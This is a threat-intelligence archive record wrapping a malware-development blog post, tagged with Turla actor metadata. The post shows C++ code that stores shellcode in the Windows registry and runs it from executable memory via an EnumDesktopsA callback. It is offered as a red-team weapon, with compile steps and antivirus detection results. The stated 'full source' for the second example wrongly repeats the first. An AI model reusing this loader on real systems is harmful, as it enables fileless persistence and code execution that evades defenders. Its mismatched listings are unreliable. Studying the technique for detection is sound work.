{ "id": "2ae9e0b9-613b-43a2-ae0b-a5c663856772", "created_at": "2026-04-06T00:09:22.869421Z", "updated_at": "2026-04-10T13:12:31.814403Z", "deleted_at": null, "sha1_hash": "d0de7530c11901c21ae200bb35d8c703df46a313", "title": "Malware development trick - part 29: Store binary data in registry. Simple C++ example.", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2069494, "plain_text": "Malware development trick - part 29: Store binary data in registry.\r\nSimple C++ example.\r\nBy cocomelonc\r\nPublished: 2023-05-22 · Archived: 2026-04-05 21:17:10 UTC\r\n7 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nToday, I just want to focus my research on another malware development trick: storing binary data in Windows\r\nRegistry. It is a common technique that can be used by malware for persistence or also to store malicious\r\npayloads.\r\npractical example 1Permalink\r\nBelow is a simple example code of storing binary data in the registry:\r\nvoid registryStore() {\r\n HKEY hkey;\r\n BYTE data[] = {0x6d, 0x65, 0x6f, 0x77, 0x6d, 0x65, 0x6f, 0x77};\r\n DWORD d;\r\nhttps://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html\r\nPage 1 of 11\n\nconst char* secret = \"Software\\\\meowApp\";\r\n LSTATUS res = RegCreateKeyEx(HKEY_CURRENT_USER, (LPCSTR) secret, 0, NULL, 0, KEY_WRITE, NULL, \u0026hkey, \u0026d);\r\n printf (res != ERROR_SUCCESS ? \"failed to create reg key :(\\n\" : \"successfully create key :)\\n\");\r\n res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR) secret, 0, KEY_WRITE, \u0026hkey);\r\n printf (res != ERROR_SUCCESS ? \"failed open registry key :(\\n\" : \"successfully open registry key :)\\n\");\r\n res = RegSetValueEx(hkey, (LPCSTR)\"secretMeow\", 0, REG_BINARY, data, sizeof(data));\r\n printf(res != ERROR_SUCCESS ? \"failed to set registry value :(\\n\" : \"successfully set registry value :)\\n\");\r\n RegCloseKey(hkey);\r\n}\r\nThis code will write the binary data {0x6d, 0x65, 0x6f, 0x77, 0x6d, 0x65, 0x6f, 0x77} to\r\nHKEY_CURRENT_USER\\Software\\meowApp\\secretMeow . As you can see, you need to create the Software\\meowApp\r\nkey before storing. Please ensure that you have appropriate permissions to write to the registry.\r\nOk, then how can I retrieving this binary data from registry?\r\nIt’s a simple task:\r\nvoid registryGetData() {\r\n HKEY hkey;\r\n DWORD size = 0;\r\n const char* secret = \"Software\\\\meowApp\";\r\n LSTATUS res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR)secret, 0, KEY_READ, \u0026hkey);\r\n printf(res != ERROR_SUCCESS ? \"failed to open reg key :(\\n\" : \"successfully open reg key:)\\n\");\r\n res = RegQueryValueEx(hkey, (LPCSTR)\"secretMeow\", nullptr, nullptr, nullptr, \u0026size);\r\n printf(res != ERROR_SUCCESS ? \"failed to query data size :(\\n\" : \"successfully get binary data size:)\\n\");\r\n // allocate memory for the data\r\n BYTE *data = new BYTE[size];\r\n res = RegQueryValueEx(hkey, (LPCSTR)\"secretMeow\", nullptr, nullptr, data, \u0026size);\r\n printf(res != ERROR_SUCCESS ? \"failed to query data :(\\n\" : \"successfully get binary data:)\\n\");\r\n printf(\"data:\\n\");\r\n for (int i = 0; i \u003c size; i++) {\r\n printf(\"\\\\x%02x\", static_cast\u003cint\u003e(data[i]));\r\n }\r\n printf(\"\\n\\n\");\r\n RegCloseKey(hkey);\r\nhttps://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html\r\nPage 2 of 11\n\ndelete[] data;\r\n}\r\nThe data is read into a dynamic array, which is then printed to the console just for checking correctness. It is\r\nimportant to call delete[] on the data array after you are finished with it to avoid a memory leak.\r\nSo, the full source code is look like this:\r\n/*\r\n * hack.cpp - store binary data in registry. C++ implementation\r\n * @cocomelonc\r\n * https://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstdio.h\u003e\r\n#include \u003ciostream\u003e\r\nvoid registryStore() {\r\n HKEY hkey;\r\n BYTE data[] = {0x6d, 0x65, 0x6f, 0x77, 0x6d, 0x65, 0x6f, 0x77};\r\n DWORD d;\r\n const char* secret = \"Software\\\\meowApp\";\r\n LSTATUS res = RegCreateKeyEx(HKEY_CURRENT_USER, (LPCSTR) secret, 0, NULL, 0, KEY_WRITE, NULL, \u0026hkey, \u0026d);\r\n printf (res != ERROR_SUCCESS ? \"failed to create reg key :(\\n\" : \"successfully create key :)\\n\");\r\n res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR) secret, 0, KEY_WRITE, \u0026hkey);\r\n printf (res != ERROR_SUCCESS ? \"failed open registry key :(\\n\" : \"successfully open registry key :)\\n\");\r\n res = RegSetValueEx(hkey, (LPCSTR)\"secretMeow\", 0, REG_BINARY, data, sizeof(data));\r\n printf(res != ERROR_SUCCESS ? \"failed to set registry value :(\\n\" : \"successfully set registry value :)\\n\");\r\n RegCloseKey(hkey);\r\n}\r\nvoid registryGetData() {\r\n HKEY hkey;\r\n DWORD size = 0;\r\n const char* secret = \"Software\\\\meowApp\";\r\n LSTATUS res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR)secret, 0, KEY_READ, \u0026hkey);\r\n printf(res != ERROR_SUCCESS ? \"failed to open reg key :(\\n\" : \"successfully open reg key:)\\n\");\r\n res = RegQueryValueEx(hkey, (LPCSTR)\"secretMeow\", nullptr, nullptr, nullptr, \u0026size);\r\n printf(res != ERROR_SUCCESS ? \"failed to query data size :(\\n\" : \"successfully get binary data size:)\\n\");\r\nhttps://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html\r\nPage 3 of 11\n\n// allocate memory for the data\r\n BYTE *data = new BYTE[size];\r\n res = RegQueryValueEx(hkey, (LPCSTR)\"secretMeow\", nullptr, nullptr, data, \u0026size);\r\n printf(res != ERROR_SUCCESS ? \"failed to query data :(\\n\" : \"successfully get binary data:)\\n\");\r\n printf(\"data:\\n\");\r\n for (int i = 0; i \u003c size; i++) {\r\n printf(\"\\\\x%02x\", static_cast\u003cint\u003e(data[i]));\r\n }\r\n printf(\"\\n\\n\");\r\n RegCloseKey(hkey);\r\n delete[] data;\r\n}\r\nint main(void) {\r\n registryStore();\r\n registryGetData();\r\n return 0;\r\n}\r\nNote that it’s just a dirty PoC.\r\ndemo 1Permalink\r\nLet’s go to see everything in action.\r\nFirst of all compile our “malware” in the attacker’s machine:\r\nx86_64-w64-mingw32-g++ -O2 hack.cpp -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\nThen, just run powershell as Administrator and execute our binary in victim’s machine ( Windows 10 22H2\r\nx64 ):\r\n.\\hack.exe\r\nhttps://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html\r\nPage 4 of 11\n\nAs you can see, everything is worked perfectly! =^..^=\r\npractical example 2Permalink\r\nWhat about to store payload in registry? Let’s go to check it in practice.\r\nhttps://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html\r\nPage 5 of 11\n\nJust modify our functions from hack.cpp :\r\nvoid registryStore() {\r\n HKEY hkey;\r\n const unsigned char data[] =\r\n \"\\xfc\\x48\\x81\\xe4\\xf0\\xff\\xff\\xff\\xe8\\xd0\\x00\\x00\\x00\\x41\"\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\"\r\n \"\\x3e\\x48\\x8b\\x52\\x18\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x48\\x8b\\x72\"\r\n \"\\x50\\x3e\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\"\r\n \"\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\"\r\n \"\\xed\\x52\\x41\\x51\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x8b\\x42\\x3c\\x48\"\r\n \"\\x01\\xd0\\x3e\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x6f\"\r\n \"\\x48\\x01\\xd0\\x50\\x3e\\x8b\\x48\\x18\\x3e\\x44\\x8b\\x40\\x20\\x49\"\r\n \"\\x01\\xd0\\xe3\\x5c\\x48\\xff\\xc9\\x3e\\x41\\x8b\\x34\\x88\\x48\\x01\"\r\n \"\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\"\r\n \"\\xc1\\x38\\xe0\\x75\\xf1\\x3e\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\"\r\n \"\\x75\\xd6\\x58\\x3e\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x3e\\x41\"\r\n \"\\x8b\\x0c\\x48\\x3e\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x3e\\x41\\x8b\"\r\n \"\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\"\r\n \"\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\"\r\n \"\\x59\\x5a\\x3e\\x48\\x8b\\x12\\xe9\\x49\\xff\\xff\\xff\\x5d\\x49\\xc7\"\r\n \"\\xc1\\x00\\x00\\x00\\x00\\x3e\\x48\\x8d\\x95\\x1a\\x01\\x00\\x00\\x3e\"\r\n \"\\x4c\\x8d\\x85\\x25\\x01\\x00\\x00\\x48\\x31\\xc9\\x41\\xba\\x45\\x83\"\r\n \"\\x56\\x07\\xff\\xd5\\xbb\\xe0\\x1d\\x2a\\x0a\\x41\\xba\\xa6\\x95\\xbd\"\r\n \"\\x9d\\xff\\xd5\\x48\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\"\r\n \"\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x59\\x41\\x89\\xda\\xff\"\r\n \"\\xd5\\x4d\\x65\\x6f\\x77\\x2d\\x6d\\x65\\x6f\\x77\\x21\\x00\\x3d\\x5e\"\r\n \"\\x2e\\x2e\\x5e\\x3d\\x00\";\r\n DWORD d;\r\n const char* secret = \"Software\\\\meowApp\";\r\n LSTATUS res = RegCreateKeyEx(HKEY_CURRENT_USER, (LPCSTR) secret, 0, NULL, 0, KEY_WRITE, NULL, \u0026hkey, \u0026d);\r\n printf (res != ERROR_SUCCESS ? \"failed to create reg key :(\\n\" : \"successfully create key :)\\n\");\r\n res = RegSetValueEx(hkey, (LPCSTR)\"secretMeow\", 0, REG_BINARY, data, sizeof(data));\r\n printf(res != ERROR_SUCCESS ? \"failed to set registry value :(\\n\" : \"successfully set registry value :)\\n\");\r\n RegCloseKey(hkey);\r\n}\r\nAs usually, I used meow-meow messagebox payload:\r\nconst unsigned char data[] =\r\n \"\\xfc\\x48\\x81\\xe4\\xf0\\xff\\xff\\xff\\xe8\\xd0\\x00\\x00\\x00\\x41\"\r\nhttps://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html\r\nPage 6 of 11\n\n\"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\"\r\n \"\\x3e\\x48\\x8b\\x52\\x18\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x48\\x8b\\x72\"\r\n \"\\x50\\x3e\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\"\r\n \"\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\"\r\n \"\\xed\\x52\\x41\\x51\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x8b\\x42\\x3c\\x48\"\r\n \"\\x01\\xd0\\x3e\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x6f\"\r\n \"\\x48\\x01\\xd0\\x50\\x3e\\x8b\\x48\\x18\\x3e\\x44\\x8b\\x40\\x20\\x49\"\r\n \"\\x01\\xd0\\xe3\\x5c\\x48\\xff\\xc9\\x3e\\x41\\x8b\\x34\\x88\\x48\\x01\"\r\n \"\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\"\r\n \"\\xc1\\x38\\xe0\\x75\\xf1\\x3e\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\"\r\n \"\\x75\\xd6\\x58\\x3e\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x3e\\x41\"\r\n \"\\x8b\\x0c\\x48\\x3e\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x3e\\x41\\x8b\"\r\n \"\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\"\r\n \"\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\"\r\n \"\\x59\\x5a\\x3e\\x48\\x8b\\x12\\xe9\\x49\\xff\\xff\\xff\\x5d\\x49\\xc7\"\r\n \"\\xc1\\x00\\x00\\x00\\x00\\x3e\\x48\\x8d\\x95\\x1a\\x01\\x00\\x00\\x3e\"\r\n \"\\x4c\\x8d\\x85\\x25\\x01\\x00\\x00\\x48\\x31\\xc9\\x41\\xba\\x45\\x83\"\r\n \"\\x56\\x07\\xff\\xd5\\xbb\\xe0\\x1d\\x2a\\x0a\\x41\\xba\\xa6\\x95\\xbd\"\r\n \"\\x9d\\xff\\xd5\\x48\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\"\r\n \"\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x59\\x41\\x89\\xda\\xff\"\r\n \"\\xd5\\x4d\\x65\\x6f\\x77\\x2d\\x6d\\x65\\x6f\\x77\\x21\\x00\\x3d\\x5e\"\r\n \"\\x2e\\x2e\\x5e\\x3d\\x00\";\r\nThen, retrieve shellcode and execute via EnumDesktopsA:\r\nvoid registryGetData() {\r\n HKEY hkey;\r\n DWORD size = 0;\r\n const char* secret = \"Software\\\\meowApp\";\r\n LSTATUS res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR)secret, 0, KEY_READ, \u0026hkey);\r\n printf(res != ERROR_SUCCESS ? \"failed to open reg key :(\\n\" : \"successfully open reg key:)\\n\");\r\n res = RegQueryValueEx(hkey, (LPCSTR)\"secretMeow\", nullptr, nullptr, nullptr, \u0026size);\r\n printf(res != ERROR_SUCCESS ? \"failed to query data size :(\\n\" : \"successfully get binary data size:)\\n\");\r\n // allocate memory for the data\r\n LPVOID data = VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);\r\n res = RegQueryValueEx(hkey, (LPCSTR)\"secretMeow\", nullptr, nullptr, static_cast\u003cLPBYTE\u003e(data), \u0026size);\r\n printf(res != ERROR_SUCCESS ? \"failed to query data :(\\n\" : \"successfully get binary data:)\\n\");\r\n EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)data, (LPARAM)NULL);\r\n // clean up\r\n VirtualFree(data, 0, MEM_RELEASE);\r\nhttps://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html\r\nPage 7 of 11\n\nRegCloseKey(hkey);\r\n}\r\nSo, full source code for our second example is:\r\n/*\r\n * hack.cpp - store binary data in registry. C++ implementation\r\n * @cocomelonc\r\n * https://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstdio.h\u003e\r\n#include \u003ciostream\u003e\r\nvoid registryStore() {\r\n HKEY hkey;\r\n BYTE data[] = {0x6d, 0x65, 0x6f, 0x77, 0x6d, 0x65, 0x6f, 0x77};\r\n DWORD d;\r\n const char* secret = \"Software\\\\meowApp\";\r\n LSTATUS res = RegCreateKeyEx(HKEY_CURRENT_USER, (LPCSTR) secret, 0, NULL, 0, KEY_WRITE, NULL, \u0026hkey, \u0026d);\r\n printf (res != ERROR_SUCCESS ? \"failed to create reg key :(\\n\" : \"successfully create key :)\\n\");\r\n res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR) secret, 0, KEY_WRITE, \u0026hkey);\r\n printf (res != ERROR_SUCCESS ? \"failed open registry key :(\\n\" : \"successfully open registry key :)\\n\");\r\n res = RegSetValueEx(hkey, (LPCSTR)\"secretMeow\", 0, REG_BINARY, data, sizeof(data));\r\n printf(res != ERROR_SUCCESS ? \"failed to set registry value :(\\n\" : \"successfully set registry value :)\\n\");\r\n RegCloseKey(hkey);\r\n}\r\nvoid registryGetData() {\r\n HKEY hkey;\r\n DWORD size = 0;\r\n const char* secret = \"Software\\\\meowApp\";\r\n LSTATUS res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR)secret, 0, KEY_READ, \u0026hkey);\r\n printf(res != ERROR_SUCCESS ? \"failed to open reg key :(\\n\" : \"successfully open reg key:)\\n\");\r\n res = RegQueryValueEx(hkey, (LPCSTR)\"secretMeow\", nullptr, nullptr, nullptr, \u0026size);\r\n printf(res != ERROR_SUCCESS ? \"failed to query data size :(\\n\" : \"successfully get binary data size:)\\n\");\r\n // allocate memory for the data\r\n BYTE *data = new BYTE[size];\r\nhttps://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html\r\nPage 8 of 11\n\nres = RegQueryValueEx(hkey, (LPCSTR)\"secretMeow\", nullptr, nullptr, data, \u0026size);\r\n printf(res != ERROR_SUCCESS ? \"failed to query data :(\\n\" : \"successfully get binary data:)\\n\");\r\n printf(\"data:\\n\");\r\n for (int i = 0; i \u003c size; i++) {\r\n printf(\"\\\\x%02x\", static_cast\u003cint\u003e(data[i]));\r\n }\r\n printf(\"\\n\\n\");\r\n RegCloseKey(hkey);\r\n delete[] data;\r\n}\r\nint main(void) {\r\n registryStore();\r\n registryGetData();\r\n return 0;\r\n}\r\ndemo 2Permalink\r\nLet’s go to see in action this logic. First of all compile hack2.cpp :\r\nx86_64-w64-mingw32-g++ -O2 hack.cpp -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\nThen, just run powershell as Administrator and execute our binary in victim’s machine ( Windows 10 22H2\r\nx64 ):\r\n.\\hack2.exe\r\nhttps://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html\r\nPage 9 of 11\n\nAs you can see, everything is worked as expected! =^..^=\r\nThis method of executing code is often used by malicious software (for example ComRAT, PillowMint and\r\nPipeMon) and APT groups (Turla), so it’s likely to be flagged by antivirus software, and may not work on systems\r\nwith certain security measures in place.\r\nLet’s go to upload it to VirusTotal:\r\nhttps://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html\r\nPage 10 of 11\n\nhttps://www.virustotal.com/gui/file/fe7e412aef1af9dee801224567151f7eaa17ffdbc8c1e97202b4faccb53100e8/details\r\nSo, 16 of of 70 AV engines detect our file as malicious.\r\nI hope this post spreads awareness to the blue teamers of this interesting malware dev technique, and adds a\r\nweapon to the red teamers arsenal.\r\nRegCreateKeyEx\r\nRegOpenKeyEx\r\nRegSetValueEx\r\nEnumDesktopsA\r\nMITTRE ATT\u0026CK: Fileless Storage\r\nComRAT\r\nPillowMint\r\nPipeMon\r\nTurla\r\nsource code in github\r\nThis is a practical case for educational purposes only.\r\nThanks for your time happy hacking and good bye!\r\nPS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html\r\nhttps://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html" ], "report_names": [ "malware-tricks-29.html" ], "threat_actors": [ { "id": "8aaa5515-92dd-448d-bb20-3a253f4f8854", "created_at": "2024-06-19T02:03:08.147099Z", "updated_at": "2026-04-10T02:00:03.685355Z", "deleted_at": null, "main_name": "IRON HUNTER", "aliases": [ "ATK13 ", "Belugasturgeon ", "Blue Python ", "CTG-8875 ", "ITG12 ", "KRYPTON ", "MAKERSMARK ", "Pensive Ursa ", "Secret Blizzard ", "Turla", "UAC-0003 ", "UAC-0024 ", "UNC4210 ", "Venomous Bear ", "Waterbug " ], "source_name": "Secureworks:IRON HUNTER", "tools": [ "Carbon-DLL", "ComRAT", "LightNeuron", "Mosquito", "PyFlash", "Skipper", "Snake", "Tavdig" ], "source_id": "Secureworks", "reports": null }, { "id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac", "created_at": "2022-10-25T16:07:24.349252Z", "updated_at": "2026-04-10T02:00:04.949821Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "ATK 13", "Belugasturgeon", "Blue Python", "CTG-8875", "G0010", "Group 88", "ITG12", "Iron Hunter", "Krypton", "Makersmark", "Operation Epic Turla", "Operation Moonlight Maze", "Operation Penguin Turla", "Operation Satellite Turla", "Operation Skipper Turla", "Operation Turla Mosquito", "Operation WITCHCOVEN", "Pacifier APT", "Pensive Ursa", "Popeye", "SIG15", "SIG2", "SIG23", "Secret Blizzard", "TAG-0530", "Turla", "UNC4210", "Venomous Bear", "Waterbug" ], "source_name": "ETDA:Turla", "tools": [ "ASPXSpy", "ASPXTool", "ATI-Agent", "AdobeARM", "Agent.BTZ", "Agent.DNE", "ApolloShadow", "BigBoss", "COMpfun", "Chinch", "Cloud Duke", "CloudDuke", "CloudLook", "Cobra Carbon System", "ComRAT", "DoublePulsar", "EmPyre", "EmpireProject", "Epic Turla", "EternalBlue", "EternalRomance", "GoldenSky", "Group Policy Results Tool", "HTML5 Encoding", "HyperStack", "IcedCoffee", "IronNetInjector", "KSL0T", "Kapushka", "Kazuar", "KopiLuwak", "Kotel", "LOLBAS", "LOLBins", "LightNeuron", "Living off the Land", "Maintools.js", "Metasploit", "Meterpreter", "MiamiBeach", "Mimikatz", "MiniDionis", "Minit", "NBTscan", "NETTRANS", "NETVulture", "Neptun", "NetFlash", "NewPass", "Outlook Backdoor", "Penquin Turla", "Pfinet", "PowerShell Empire", "PowerShellRunner", "PowerShellRunner-based RPC backdoor", "PowerStallion", "PsExec", "PyFlash", "QUIETCANARY", "Reductor RAT", "RocketMan", "SMBTouch", "SScan", "Satellite Turla", "SilentMoon", "Sun rootkit", "TTNG", "TadjMakhal", "Tavdig", "TinyTurla", "TinyTurla Next Generation", "TinyTurla-NG", "Topinambour", "Tunnus", "Turla", "Turla SilentMoon", "TurlaChopper", "Uroburos", "Urouros", "WCE", "WITCHCOVEN", "WhiteAtlas", "WhiteBear", "Windows Credential Editor", "Windows Credentials Editor", "Wipbot", "WorldCupSec", "XTRANS", "certutil", "certutil.exe", "gpresult", "nbtscan", "nbtstat", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": "a97fee0d-af4b-4661-ae17-858925438fc4", "created_at": "2023-01-06T13:46:38.396415Z", "updated_at": "2026-04-10T02:00:02.957137Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "TAG_0530", "Pacifier APT", "Blue Python", "UNC4210", "UAC-0003", "VENOMOUS Bear", "Waterbug", "Pfinet", "KRYPTON", "Popeye", "SIG23", "ATK13", "ITG12", "Group 88", "Uroburos", "Hippo Team", "IRON HUNTER", "MAKERSMARK", "Secret Blizzard", "UAC-0144", "UAC-0024", "G0010" ], "source_name": "MISPGALAXY:Turla", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3", "created_at": "2022-10-25T15:50:23.509601Z", "updated_at": "2026-04-10T02:00:05.277674Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "Turla", "IRON HUNTER", "Group 88", "Waterbug", "WhiteBear", "Krypton", "Venomous Bear", "Secret Blizzard", "BELUGASTURGEON" ], "source_name": "MITRE:Turla", "tools": [ "PsExec", "nbtstat", "ComRAT", "netstat", "certutil", "KOPILUWAK", "IronNetInjector", "LunarWeb", "Arp", "Uroburos", "PowerStallion", "Kazuar", "Systeminfo", "LightNeuron", "Mimikatz", "Tasklist", "LunarMail", "HyperStack", "NBTscan", "TinyTurla", "Penquin", "LunarLoader" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434162, "ts_updated_at": 1775826751, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/d0de7530c11901c21ae200bb35d8c703df46a313.pdf", "text": "https://archive.orkl.eu/d0de7530c11901c21ae200bb35d8c703df46a313.txt", "img": "https://archive.orkl.eu/d0de7530c11901c21ae200bb35d8c703df46a313.jpg" } }